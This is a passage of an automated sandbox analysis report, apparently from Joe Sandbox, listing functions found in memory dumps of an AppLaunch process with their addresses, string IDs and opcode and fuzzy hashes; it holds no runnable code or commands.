                                                                                                                                                                                              • Instruction ID: 40036d675665f31bbe20f25dc5e2d66487126439b84274e3c22166d055df53dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cc4f479a9cc82f4cd4ce7798f65b5ac887ef8821519e9be722595e908c63be5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98C1B374E01218CFDB64DFA5D984B9DBBB2BF89304F1081AAD409BB354DB315985CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09163FC0 Relevance: .2, Instructions: 220COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: dde6ce2130a604fc80bb6d3bf2fddfab17f31b59e5e07d33cf19d89fa75c1a2e
                                                                                                                                                                                              • Instruction ID: 53323c704971036397c3d388aa6968a6191749b4f764ef12a628f59d7dd2722c
                                                                                                                                                                                              • Opcode Fuzzy Hash: dde6ce2130a604fc80bb6d3bf2fddfab17f31b59e5e07d33cf19d89fa75c1a2e
                                                                                                                                                                                              • Instruction Fuzzy Hash: FEA1E574E01228CFDB68DF65C854B9EBBB2BF89304F1081EAD509AB394DB315A85CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 057403AF Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: acd6c9e5334f1cf80dcea587dd2e3552cc2e3da08be3424468775cf9ce2455c3
                                                                                                                                                                                              • Instruction ID: 1354789d860a66e108f9ebad1edfc5c03f62bb4bea207d6e8ad7f355b9712868
                                                                                                                                                                                              • Opcode Fuzzy Hash: acd6c9e5334f1cf80dcea587dd2e3552cc2e3da08be3424468775cf9ce2455c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: A951B071D082588FDB54EFAADC557DABBB3EF85300F04C4B7C448AA252EB3449859F61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05741EE0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bc7655ae2c3c179f7c36b0e8934e40bf83df9782ed237ef0d258a4dda0b2d2a0
                                                                                                                                                                                              • Instruction ID: dc1b06647ca2c36e2a925715e088ecb2613ae0b93af89cd1aba92662a32a6796
                                                                                                                                                                                              • Opcode Fuzzy Hash: bc7655ae2c3c179f7c36b0e8934e40bf83df9782ed237ef0d258a4dda0b2d2a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA61C574E05218DFDB18CFAAD984B9DBBF2BF88300F1481AAE809A7355DB319945CF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C6B70 Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8cWj$8cWj
                                                                                                                                                                                              • API String ID: 0-1900758303
                                                                                                                                                                                              • Opcode ID: 9d5bc4c82dca6de4737033c83a6b1066fd989a65597060c59f0dce90504c5abc
                                                                                                                                                                                              • Instruction ID: 98bfd3ea7e5be8fdd9b806cf1b1c0058c6ba492d1f306b579119ff9227f97512
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d5bc4c82dca6de4737033c83a6b1066fd989a65597060c59f0dce90504c5abc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D1BD357052018FD765DB28D494A6EBBE2EF85320B64816EE909CF352DB37EC42C791
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09160040 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (h
                                                                                                                                                                                              • API String ID: 0-2899713138
                                                                                                                                                                                              • Opcode ID: 32cceb7f34a4820a5725c8a715bd951db7fd2fed476701ec5d92c4ae8375ee92
                                                                                                                                                                                              • Instruction ID: 592066fa622a7d11744cf85975a2e4551e5d270034d31ca925f900f128dcd6b1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 32cceb7f34a4820a5725c8a715bd951db7fd2fed476701ec5d92c4ae8375ee92
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E327A74E012298FDB64DF69C994BDEBBB2BB49304F1081EAD909A7355DB315E81CF80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09160006 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (h
                                                                                                                                                                                              • API String ID: 0-2899713138
                                                                                                                                                                                              • Opcode ID: 6d6e512de99d44171db5789d42fed244786418686e0db7d855499c104c44b3ab
                                                                                                                                                                                              • Instruction ID: 1bcab37aab9643794bbb1a4de029fed49286862195929f44a60913481ab6c356
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d6e512de99d44171db5789d42fed244786418686e0db7d855499c104c44b3ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF1AC74E012298FDB65DF68C894BDEBBB2AF49300F1081EAD809AB355DB315E85CF41
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09169620 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: KTji^
                                                                                                                                                                                              • API String ID: 0-1499186176
                                                                                                                                                                                              • Opcode ID: 42259f3faec71dde87e270b3ffb6a5e9061194ee1fac2f902b10e917fd4fa7c3
                                                                                                                                                                                              • Instruction ID: adfbb7329e4971cb4dd69125991efe732b244eeaea3a7b6a7fc03ccfcd227f22
                                                                                                                                                                                              • Opcode Fuzzy Hash: 42259f3faec71dde87e270b3ffb6a5e9061194ee1fac2f902b10e917fd4fa7c3
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3711775F00514CFCF28AF68C5946EEBAE6AB84358F15443AE856AB2B4DB305D50C782
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CD1C0 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: cWj
                                                                                                                                                                                              • API String ID: 0-961755098
                                                                                                                                                                                              • Opcode ID: 64b00bceea63532972f63fc580bd1ebd0357598e7a6b37423b3e9c74aaa153e9
                                                                                                                                                                                              • Instruction ID: 63e0e8507d45e72e56a0b88d825620cd6fa2016e1d69faed68597f3bda315880
                                                                                                                                                                                              • Opcode Fuzzy Hash: 64b00bceea63532972f63fc580bd1ebd0357598e7a6b37423b3e9c74aaa153e9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03715C346002099FCB54DF68D884AAEBBF2FF88310F04C969D9169B656DB35ED45CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CD1B8 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: cWj
                                                                                                                                                                                              • API String ID: 0-961755098
                                                                                                                                                                                              • Opcode ID: 3dcf3029109f8c45c544f5140316dbd8eae53f2f09ed3c7306c64ae3edfa9779
                                                                                                                                                                                              • Instruction ID: b94feb7e99e757d6732e00f382fa6dac34a2569cf8d853b3b38798a5ff3850ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dcf3029109f8c45c544f5140316dbd8eae53f2f09ed3c7306c64ae3edfa9779
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0616D34600245DFCB50DF68D884AAEFBF2FF84310B14C96AD8658F656DB34E945CBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CD198 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: cWj
                                                                                                                                                                                              • API String ID: 0-961755098
                                                                                                                                                                                              • Opcode ID: a4cbae8bf10b8c57867c9595598f8b3cca51eebd76348cc072e55d9770e83e3e
                                                                                                                                                                                              • Instruction ID: 590ae3cd238155ea939dac35cf4fd3a31f75ee3cff206836400e4080655ddedd
                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cbae8bf10b8c57867c9595598f8b3cca51eebd76348cc072e55d9770e83e3e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F515C34601246CFCB50DF68D884AAEFBF2EF84310B04C96AD8559B257DB35E945CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05742689 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: r
                                                                                                                                                                                              • API String ID: 0-1812594589
                                                                                                                                                                                              • Opcode ID: 9796cb13446f73ecfac85302aff88e5c44d867f901e894efcd4a7dbd31981d15
                                                                                                                                                                                              • Instruction ID: 3c045c46e4101fc7ef963ca63c82084078d15278db9774ad7153b6cadb3a6e3a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9796cb13446f73ecfac85302aff88e5c44d867f901e894efcd4a7dbd31981d15
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8614E78914205DFCB05DFA9C5848AEFBB2FF48301B25C295E8059B356CB31E985DFA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CB9E0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: cWj
                                                                                                                                                                                              • API String ID: 0-961755098
                                                                                                                                                                                              • Opcode ID: 92b6b41ad0981dfc98417356c702cab8a8d0315e32bfb0ee854436b45853063e
                                                                                                                                                                                              • Instruction ID: 051c40a7ae14b5bedc32f877d1d01c6a2e5b566fad50438012816f74a3cbc518
                                                                                                                                                                                              • Opcode Fuzzy Hash: 92b6b41ad0981dfc98417356c702cab8a8d0315e32bfb0ee854436b45853063e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41FD743102058FCB649B39D41566DBBE6AFC9710B6884AEE046CB3A2DE38DC51DBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09169D48 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: KTji^
                                                                                                                                                                                              • API String ID: 0-1499186176
                                                                                                                                                                                              • Opcode ID: d372c98254f033d609b6b78c9f2bb8b39a4587f25d684988c379fd3a2968d424
                                                                                                                                                                                              • Instruction ID: 7e47b079ae19aa2254a982791a99993405fa8ae159e1e633809793f167ee0c93
                                                                                                                                                                                              • Opcode Fuzzy Hash: d372c98254f033d609b6b78c9f2bb8b39a4587f25d684988c379fd3a2968d424
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B11AF347022459FC728DF79D85059ABBE2FF89318720897ED05A8B3A4DB32A805CBD0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09169D58 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: KTji^
                                                                                                                                                                                              • API String ID: 0-1499186176
                                                                                                                                                                                              • Opcode ID: 8d67068448d89793ef99ad1fbd50010bb4f1e8ccfbead40fa00e0b7efdf89b90
                                                                                                                                                                                              • Instruction ID: e5d43bddaeeb3d4ab3e7824a2b5025bee185d5e1ebacd319a5f9ff3966572523
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d67068448d89793ef99ad1fbd50010bb4f1e8ccfbead40fa00e0b7efdf89b90
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B118F357012058FDB24AF79D85059ABBE6EB85318720893DD11A8B354DB32AC05CBD4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C0F07 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8cWj
                                                                                                                                                                                              • API String ID: 0-114768382
                                                                                                                                                                                              • Opcode ID: c88a05be2369af8d159dea3d19185a86115552f25ccb6fc23e43c464586a3b25
                                                                                                                                                                                              • Instruction ID: 272d5187ec113b29a9065bccd361220bada9b43f8d4b7fe262ce579862c8a9a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: c88a05be2369af8d159dea3d19185a86115552f25ccb6fc23e43c464586a3b25
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD112534201B41EFC325DF2AE494806BBF2FF893203108A6ED85987B02DB30F855CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C0F18 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8cWj
                                                                                                                                                                                              • API String ID: 0-114768382
                                                                                                                                                                                              • Opcode ID: 43cd75d5f50e060bd433ec000d2cce64725a5ab8b1b6b190c503f2ae0e6b7bf7
                                                                                                                                                                                              • Instruction ID: cb43870c2753c3fe9b04a1c56cdab554832637879af96aa7ffc47cfdea2adb5d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 43cd75d5f50e060bd433ec000d2cce64725a5ab8b1b6b190c503f2ae0e6b7bf7
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA01C578601B059FC364DF2AE484806B7F6FF883213508A2AD85A87B01DB31F855CBD1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574A0A8 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8cWj
                                                                                                                                                                                              • API String ID: 0-114768382
                                                                                                                                                                                              • Opcode ID: d4d757ac9f962bef503fd6c2818b3cd26aacc734a98fa7823eedb0707a68e68d
                                                                                                                                                                                              • Instruction ID: 7215dd52d1cbe7a7a01e6cbb5b4c88b880beec5dc10246dfa0f8c2e4954c7fce
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4d757ac9f962bef503fd6c2818b3cd26aacc734a98fa7823eedb0707a68e68d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D01AD302016048FC760EF69E49866A77F3EFC4315F50C93EC5868B646DF39A80ACB92
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574A0B8 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 8cWj
                                                                                                                                                                                              • API String ID: 0-114768382
                                                                                                                                                                                              • Opcode ID: 7092581197672e2b279ed75faa6bd5fed4263c011d0486f7158de9a33b988fa7
                                                                                                                                                                                              • Instruction ID: 323f114b4783faabf8b8f9ae54863ef4f6b6c2abb8ed432ca67643f05a39367c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7092581197672e2b279ed75faa6bd5fed4263c011d0486f7158de9a33b988fa7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0015E302056048BD364AF69E41866B77F3EFC4325B51C92ED14A87645DF75A8098B92
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CAE40 Relevance: .4, Instructions: 427COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a2c3a74ad03668a4e8b16c06a0b955b2d83fed1ecb60ee4112232fce28c4477f
                                                                                                                                                                                              • Instruction ID: 3a98410be8c1cd625f4f6e80b0120e0bde51bb97e7fe4b0d7748b5622fce03ab
                                                                                                                                                                                              • Opcode Fuzzy Hash: a2c3a74ad03668a4e8b16c06a0b955b2d83fed1ecb60ee4112232fce28c4477f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF18D74B00205DFCB54DFA9C495AAEBBF2BF88310F558469E845AB392DB34EC41CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05743E69 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0bfa4f88c77bbd898e4a1c45d1d5270ccefaee435a2450c71af9ef1324766e58
                                                                                                                                                                                              • Instruction ID: a9daedfb7e7c680d8067e5377fe4f6ef2fda456bea26386c2f8a094c07c7139c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bfa4f88c77bbd898e4a1c45d1d5270ccefaee435a2450c71af9ef1324766e58
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CF1DF74A05228CFDB64DF69C988BEDBBB2FB49301F1085EAD409A7351DB349A84DF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C47DB Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 85c209b6e6f3ebc086e4e5555f30774380e27f01013054ee1c3c43698362a221
                                                                                                                                                                                              • Instruction ID: b136ffe78898cbefe1ab7d4a5989d0a46ba3a44cbc7c1a66471f5a988d834b1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85c209b6e6f3ebc086e4e5555f30774380e27f01013054ee1c3c43698362a221
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4E13A38A00209CFDB14DFA4D498A6DBBF2FF84315F60856DE5169F2A6DB35AC45CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0CDB70 Relevance: .3, Instructions: 325COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2304c910b0ab6db2ddbd8f4c8eccb46f1fc39346f84c562734ea625229dbfa11
                                                                                                                                                                                              • Instruction ID: 77f26d5c54e8c0028cf997eb17529ee5a98b2a8e278e6710df0172603fef0844
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2304c910b0ab6db2ddbd8f4c8eccb46f1fc39346f84c562734ea625229dbfa11
                                                                                                                                                                                              • Instruction Fuzzy Hash: 73D14D34B01205DFCB14DF68D884AAEBBB2FF84310F14C969E9159B256DB31ED46CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09164A48 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 205cd8be274312c5d3a6c99ca0259cb8dd530b3d1fcb32d79661d4094ff9b2eb
